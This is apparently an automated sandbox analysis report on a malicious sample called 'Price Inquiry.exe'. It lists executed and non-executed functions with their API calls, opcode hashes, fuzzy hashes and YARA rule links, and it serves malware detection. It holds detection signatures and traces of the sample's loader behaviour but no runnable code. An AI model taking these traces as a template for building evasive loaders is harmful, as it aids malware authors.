Instruction ID: ab858b064b5e4a2c70419e83fc79ac774681a6596ddb93124f14d16caf27d5aa
Opcode Fuzzy Hash: 4e750b149a67f3cf2852196fb2a1f0a01b0efbdc8e378aba0c86ab99f73d9a8c
Instruction Fuzzy Hash: DD1146B19003498FDB20DFAAC845BDEFBF4EF88224F24881AD519A7640CB75A545CBA5

Function 076B6138 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 076B619D

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b3a13d297ff582f44be62d1e37af64aee38a57328de4687ca90677e01508caae
Instruction ID: db8db131cbdd500a4a7554211d87da02d8cf325d70f27d88d3384419ab2d60d2
Opcode Fuzzy Hash: b3a13d297ff582f44be62d1e37af64aee38a57328de4687ca90677e01508caae
Instruction Fuzzy Hash: 431125B58003099FDB10CF9AD945BDEBBF8EB48320F10841AD918A3641C375A584CFA1

Function 076B3560 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 076B35C2

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b3862b256daeaa1a7f9723b6cd3eb4c35fa842deb66875d1e1e34aac558a0389
Instruction ID: a7c738bdaf905e31d9f198cd7181ef6404cbac72d7a63720bfa800743b7f9f0f
Opcode Fuzzy Hash: b3862b256daeaa1a7f9723b6cd3eb4c35fa842deb66875d1e1e34aac558a0389
Instruction Fuzzy Hash: 311128B19003498FDB20DFAAC8457DEFBF4EF88624F248819D519A7240CB75A544CB95

Function 0111B5F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0111B65E

Memory Dump Source

Source File: 00000000.00000002.2177255482.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1110000_Price Inquiry.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8ae77d9329661ef864483ef52f45764082343e68d20f665f112b7301c782c603
Instruction ID: d9234e2e07a40fdfa117d3d10bfbda3e617948b5f33dcb507e95e077cb56d7df
Opcode Fuzzy Hash: 8ae77d9329661ef864483ef52f45764082343e68d20f665f112b7301c782c603
Instruction Fuzzy Hash: A9110FB6C046498FDB14CF9AC844A9EFBF4AB88224F10842AD918A7210D379A545CFA5

Function 076B6140 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 076B619D

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 4f5fcbb0c9f407842b7a2c69c3b67871d04e083554be4b06bb7e9d01169be8e6
Instruction ID: 635a7bc58c5a962357fd9a2acaba38a080e4b990ecaa91dff56418b248f78e0f
Opcode Fuzzy Hash: 4f5fcbb0c9f407842b7a2c69c3b67871d04e083554be4b06bb7e9d01169be8e6
Instruction Fuzzy Hash: 051103B5800349DFDB10CF9AD944BDEBBF8EB48320F10841AD918A3240C375A544CFA1

Function 08E820A0 Relevance: 1.3, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,08E81F59,?,?), ref: 08E82100

Memory Dump Source

Source File: 00000000.00000002.2183152770.0000000008E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e80000_Price Inquiry.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 39a99d275c9d3b218ffe9f1d606ff1699d7eb5eb7e89014848394dae9d64cdb7
Instruction ID: e5af926f763c13fd310edd3f3d5fd0fe621c607552cef8910131c03a4c633eb7
Opcode Fuzzy Hash: 39a99d275c9d3b218ffe9f1d606ff1699d7eb5eb7e89014848394dae9d64cdb7
Instruction Fuzzy Hash: 753128B6900209DFDB10DF99C945BAEBBF4EF48314F24845AE618A7351C775A944CBA0

Function 08E815AC Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,08E81F59,?,?), ref: 08E82100

Memory Dump Source

Source File: 00000000.00000002.2183152770.0000000008E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e80000_Price Inquiry.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6263f372a84afe14b10a913021db189cc390f014cfb70a3f00bdfc8b42cb796d
Instruction ID: 736dae87751723457ee8dabf203d8b65b1d0d4d4437360d29cd00f31876b18fd
Opcode Fuzzy Hash: 6263f372a84afe14b10a913021db189cc390f014cfb70a3f00bdfc8b42cb796d
Instruction Fuzzy Hash: 2F1158B6800349CFCB10DF9AC445BDEBBF4EB48320F20841AD618A7240D778A944CFA1

Function 010BD1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2177039871.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10bd000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca01e883d129ed04a0104546669c3afff0632c3ff65b72d3d1b1477c25fd2272
Instruction ID: 0b4dec486a67dc9a2ad295e76ec076795d6dcc50bb959cbe9737909a245f8a17
Opcode Fuzzy Hash: ca01e883d129ed04a0104546669c3afff0632c3ff65b72d3d1b1477c25fd2272
Instruction Fuzzy Hash: 0C214872504280EFDB05DF84D9C0B6AFFA1FB98328F20C1A9ED490B256C336D416CBA1

Function 010BD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2177039871.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10bd000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4336d4c3689c3e535852a0a1c086fb11cb11627b58373873ae130eecc5691ed
Instruction ID: 5c9b5fcde9901f6d666c8b4d9a97cfcf34b403144c264b5ef69fb8d3414fac14
Opcode Fuzzy Hash: c4336d4c3689c3e535852a0a1c086fb11cb11627b58373873ae130eecc5691ed
Instruction Fuzzy Hash: 22210372504244EFDB05DF54D9C0B6AFFA5FB8831CF20C5A9E9490B256C33AD456CBA1

Function 010CD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2177086040.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10cd000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d4fb5b4455d34cb88f134783180d4f813a787c333a216f883ecaa1c9948cf4
Instruction ID: 57513deb83f840f5dec09eef3bd5308853c5e2d4fdf250f07214971100caef24
Opcode Fuzzy Hash: a3d4fb5b4455d34cb88f134783180d4f813a787c333a216f883ecaa1c9948cf4
Instruction Fuzzy Hash: 4A21F175504200EFDB15DF58D580B2ABBA1EB84B14F30C5ADE98A0B252C376D406CFA1

Function 010CD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2177086040.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10cd000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 059c49908ed46d2ecc958ce998392069df2bc180754fb74f9735bf50407923e0
Instruction ID: dc216fe7556c920b2ff1736ef3479a57b68dbd61e63b3ef666fc205de49ae599
Opcode Fuzzy Hash: 059c49908ed46d2ecc958ce998392069df2bc180754fb74f9735bf50407923e0
Instruction Fuzzy Hash: F6212571504200EFDB05DF94D9C0B2ABBA2FB84B24F20C5BDE9894B292C376D406CFA1

Function 010CD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2177086040.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10cd000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c8124340f361e80e7da61d9cb89b630db396407073edb30234143c8ecdd6c5d
Instruction ID: 4e55b323f80815e8869a58be65c996bfb300af78538fe2660f080cc304a15459
Opcode Fuzzy Hash: 1c8124340f361e80e7da61d9cb89b630db396407073edb30234143c8ecdd6c5d
Instruction Fuzzy Hash: 192183755083809FCB02CF58D994715BFB1EB46614F24C5EAD8898B2A7C33A9806CBA2

Function 010BD1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2177039871.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10bd000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
Instruction ID: 79ce1d84d0748c6b9a7cd973ffd90136366e13f18f50827fb8f3bd74fe799636
Opcode Fuzzy Hash: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
Instruction Fuzzy Hash: B721CD76404280DFCB06CF44D9C4B56FFA2FB84324F24C1AADC480A256C33AD426CBA1

Function 010BD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2177039871.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10bd000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 64833326e7e07bb74c74fbf53b9b9ced037f0332e463b257fc2d35c18aef12b9
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 8311AF76504284CFCB16CF54D5C4B56FFB1FB84318F24C6A9D8490B656C33AD456CBA1

Function 010CD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2177086040.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10cd000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: 5db3f1fdb3427c5cac4f7e78c6ef3743ec4bb888459318817f64ac39231b3d6b
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 3311BE76504280DFCB02CF54C5C0B19BBA2FB84624F24C6ADD8494B296C33AD40ACF91

Function 010BD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2177039871.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10bd000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a2fcc4aa3e034cc14cf97f974b261e81c09c1e1e3344c56aac1f0c8cf3a939f
Instruction ID: b64a111236973cb02679190ece00da3d8d8e2937b172a631d25864c6d62377ba
Opcode Fuzzy Hash: 1a2fcc4aa3e034cc14cf97f974b261e81c09c1e1e3344c56aac1f0c8cf3a939f
Instruction Fuzzy Hash: D3012B710443809AF7104EA9CDC4BEAFFD8FF41328F18C55AEE484A286E6799840C771

Function 010BD744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2177039871.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10bd000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91b8c7b7237956d1d2bb98a93a37a811681dbef627ae96193a55c79c51e3d391
Instruction ID: 2ff6aebbcc6d73512538bb9c0c5d7518132a6744e33da88633531873eaf2d464
Opcode Fuzzy Hash: 91b8c7b7237956d1d2bb98a93a37a811681dbef627ae96193a55c79c51e3d391
Instruction Fuzzy Hash: 22F0FC714043449EF7108E19CDC4BA6FFD8EB41634F14C09AED484B287D3799844CB71

Non-executed Functions

Function 076B10B0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6313d5dd823b900a31bb5f8ff4038cdedfc350672dec1e89ee5744201e07582f
Instruction ID: ac4cb73f04143e2e24e29048bf16df0351c1f13cc8e90c82a4048c36cb3ead56
Opcode Fuzzy Hash: 6313d5dd823b900a31bb5f8ff4038cdedfc350672dec1e89ee5744201e07582f
Instruction Fuzzy Hash: 82E12CB4E001599FCB14DFA9C590AAEFBF2BF4A300F248269D415AB315D731A986CF60

Function 076B0C78 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2536d2783195db93b4149be57acd0ba022df33203a34b579af611f1d886e172
Instruction ID: e8eec859179ed0de4e75b33fdee6eb4cac00ebcc11a912d3ff935a2e080d1972
Opcode Fuzzy Hash: b2536d2783195db93b4149be57acd0ba022df33203a34b579af611f1d886e172
Instruction Fuzzy Hash: E5E10CB4E002598FDB14DFA9C590AAEFBF2FF89304F248259D415AB355D731A982CF60

Function 076B2CE8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a71cb26b300dc7682da68b4eb9c77d7f481e5258c72195caf2f39ae88e21e7f
Instruction ID: bfac0c410d189baafabf0018044e9fc8819dc01b1a196d9f6bb638797270343b
Opcode Fuzzy Hash: 3a71cb26b300dc7682da68b4eb9c77d7f481e5258c72195caf2f39ae88e21e7f
Instruction Fuzzy Hash: 2EE10CB4E001598FDB14DFA9C590AAEFBF2FF89304F248269D415AB355D731A982CF60

Function 076B0840 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c84c99504156afbaf251315bee82befbdfd02e65fa9828cb06c16201989a3f9
Instruction ID: 4792cc886f02511ebee1767e11a07f56b63af7e56f3282dba3325b959cac19fd
Opcode Fuzzy Hash: 1c84c99504156afbaf251315bee82befbdfd02e65fa9828cb06c16201989a3f9
Instruction Fuzzy Hash: E5E1FCB4E002598FDB14DFA9C590AAEFBB2FF49304F248259D415AB355D731AD82CF60

Function 076B28B0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa6db32b7f0080298557e1a97ccc13f5db05d951800d2a47e0490ba6898593a6
Instruction ID: b59e4f0bbc0b89f10bd73e70fc3843f20f828eea084183b18c6a33c74bfd4b22
Opcode Fuzzy Hash: aa6db32b7f0080298557e1a97ccc13f5db05d951800d2a47e0490ba6898593a6
Instruction Fuzzy Hash: 2DE1ECB4E002598FDB14DFA9C590AAEFBF2FF49304F248269D415AB355D731A982CF60

Function 0111E1F4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2177255482.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1110000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bafbea04dc3838c2d2d6cfead87ea3016364eb5ddc7f46754969242dc34199e
Instruction ID: 09f7a432e2437f66f23bdb58756fb4d1c12ef9fa7f610f0d88efc370f3aeafbf
Opcode Fuzzy Hash: 2bafbea04dc3838c2d2d6cfead87ea3016364eb5ddc7f46754969242dc34199e
Instruction Fuzzy Hash: 2AA15C32E0021A8FCF1ADFB4C8545DEBBB2FF84304B15457AE905AB269DB75D94ACB40

Function 076B0821 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddbd583b09be9db5dadad03fe00d5e36199e1ec49a678b5157bc4f195a967ebd
Instruction ID: 904a4eae0243701e3dbd671723173d7397ac80d8633baee67893ddbf0dca1567
Opcode Fuzzy Hash: ddbd583b09be9db5dadad03fe00d5e36199e1ec49a678b5157bc4f195a967ebd
Instruction Fuzzy Hash: C5512CB5E002598FDB14DF69C5805EEFBB2BF89304F24816AD419AB315D7309E42CF61

Function 076B0C68 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 255e954f4cd2e419eae453148c3d334db6ffbf06df19662da90bf02afdd83532
Instruction ID: 00bf3d3509bda30b28f1856e52c2b8faa61029421806dc7231a380365738ffab
Opcode Fuzzy Hash: 255e954f4cd2e419eae453148c3d334db6ffbf06df19662da90bf02afdd83532
Instruction Fuzzy Hash: 43514EB4E002598FDB14DFA9C5805EEFBF2BF89300F248169D409AB315D7319982CFA1

Function 076B10A0 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0641f88121c38ef9315e5b28a848e6dab4d83f79444f0808d4161c1ad6b9b7c7
Instruction ID: 927b37412acb0ca755610d839df2def66b0661315ffdccd8e35bbfc051ecdede
Opcode Fuzzy Hash: 0641f88121c38ef9315e5b28a848e6dab4d83f79444f0808d4161c1ad6b9b7c7
Instruction Fuzzy Hash: AA513FB4E002598FDB14DFA9C5905EEFBF2BF8A300F248169D418AB315D7319986CF60

Function 08E87B23 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2183152770.0000000008E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e80000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a40dc920f2ef7186ca3d11c550f94a6d05827065263df2fecc714e5fbb7e68a2
Instruction ID: b0d53c05d6a9d1c4659c654e2c1d8dca6f1e341a5ebe8067e86728eb7936b03e
Opcode Fuzzy Hash: a40dc920f2ef7186ca3d11c550f94a6d05827065263df2fecc714e5fbb7e68a2
Instruction Fuzzy Hash: AC51A275E05618DFDB58DFAAC8807CDBBF2AF89300F14D1AAD40DAB214E7305A858F10

Analysis Process: Price Inquiry.exePID: 2912, Parent PID: 4568COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	5.3%
Signature Coverage:	9.1%
Total number of Nodes:	132
Total number of Limit Nodes:	10

Executed Functions

Function 0042C4C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(DIB,?,780157A5,?,?,00424944,?,35262E7A,?,?,?,?,?,?,00000000,B783F5B3), ref: 0042C4F7

Strings

DIB, xrefs: 0042C4EE, 0042C4F6

Memory Dump Source

Source File: 00000004.00000002.2435065362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Price Inquiry.jbxd

Yara matches

Similarity

API ID: Close
String ID: DIB
API String ID: 3535843008-834349310
Opcode ID: 3d1c18abf690c68af00b4f598ef74a1842629c4662bdc5406d3ab33d1fc998b6
Instruction ID: a0408b79ca532d9f785201a0887e32feba4ce8b153a048926c007b3dc49f498c
Opcode Fuzzy Hash: 3d1c18abf690c68af00b4f598ef74a1842629c4662bdc5406d3ab33d1fc998b6
Instruction Fuzzy Hash: 9CE04F352102147BD520FA5ADC01F97B76CEFC5714F00402AFA0867242C674BA1187E4

Function 004176A3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417715

Memory Dump Source

Source File: 00000004.00000002.2435065362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Price Inquiry.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: d20514dbed541711f06c5f50188ee8c907cd2a4cac65204c9f39392a3faeb9f2
Instruction ID: 655561f7b42f22fd5511ab722963629276e900804c73589df0456ccc95ce4742
Opcode Fuzzy Hash: d20514dbed541711f06c5f50188ee8c907cd2a4cac65204c9f39392a3faeb9f2
Instruction Fuzzy Hash: 090175B5E0020DABDF10DBE5DC42FDEB7789B54308F4041A6E90897240F635EB598B55

Function 01712B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01712B6A

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ccaf95052fb271909cf39f4c27f8ea2ca26172c624b68838588beaeaffd26fe
Instruction ID: d6fe6ff9babba8304c1e03747523c48ca65e8ea9b6155d3f6dbb68817726502f
Opcode Fuzzy Hash: 8ccaf95052fb271909cf39f4c27f8ea2ca26172c624b68838588beaeaffd26fe
Instruction Fuzzy Hash: 3690026120641003420571584415616805A97E0201B55C031E10145A0DC9268A926226

Function 01712DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01712DFA

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 129f9b25391f03ec96f817a730ce34a9f9db5e5c9db7923a056a3b8a82a1c368
Instruction ID: e600d43417d15d6da552af8037c9c5b3a58776fcb0a728755df5cec20fe6c462
Opcode Fuzzy Hash: 129f9b25391f03ec96f817a730ce34a9f9db5e5c9db7923a056a3b8a82a1c368
Instruction Fuzzy Hash: 1A90023120541413D21171584505707405997D0241F95C422E0424568DDA578B53A222

Function 01712C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01712C7A

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3fe30c20ad9a364eeaccebf9736512f4c1a12902a3b0d8f5937aeffdaf3087bc
Instruction ID: 2a0f826433e31f4d0065fc0392bdd9061d101624c984ac67157b79220d43d91a
Opcode Fuzzy Hash: 3fe30c20ad9a364eeaccebf9736512f4c1a12902a3b0d8f5937aeffdaf3087bc
Instruction Fuzzy Hash: 5290023120549802D2107158840574A405597D0301F59C421E4424668DCA968A927222

Function 017135C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 017135CA

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d43564c2a2bde87dcfac0aa22a86b77a5af66113207bfe9115ad5a91925c435e
Instruction ID: ed40d259e2a5653c4c3de966a67095de121e6cfbbed4f4f52f41212058ddb00f
Opcode Fuzzy Hash: d43564c2a2bde87dcfac0aa22a86b77a5af66113207bfe9115ad5a91925c435e
Instruction Fuzzy Hash: 7590023160951402D20071584515706505597D0201F65C421E0424578DCB968B5266A3

Function 00413ED3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(q3a81SS,00000111,00000000,00000000), ref: 00413F4A

Strings

q3a81SS, xrefs: 00413F3F, 00413F49, 00413F5A
q3a81SS, xrefs: 00413F51, 00413F54

Memory Dump Source

Source File: 00000004.00000002.2435065362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Price Inquiry.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: q3a81SS$q3a81SS
API String ID: 1836367815-3972413748
Opcode ID: 761977f19e5b31266b88ac5b7620eab298a27fd4c7408419746127e231c959a9
Instruction ID: e5719b48394cd5b23321d5c39a8b94e67c60dd6515a4ea93f28de9b14b443bdf
Opcode Fuzzy Hash: 761977f19e5b31266b88ac5b7620eab298a27fd4c7408419746127e231c959a9
Instruction Fuzzy Hash: 7901D672D0121C7ADB00AAE69C81DEF7B7CDF41798F048069FA14A7141D6785F0687A9

Function 0042C7D3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00000000,?,00000000,?,?,0042494F,?), ref: 0042C80F

Strings

OIB, xrefs: 0042C7D7, 0042C7F8

Memory Dump Source

Source File: 00000004.00000002.2435065362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Price Inquiry.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: OIB
API String ID: 1279760036-1039058719
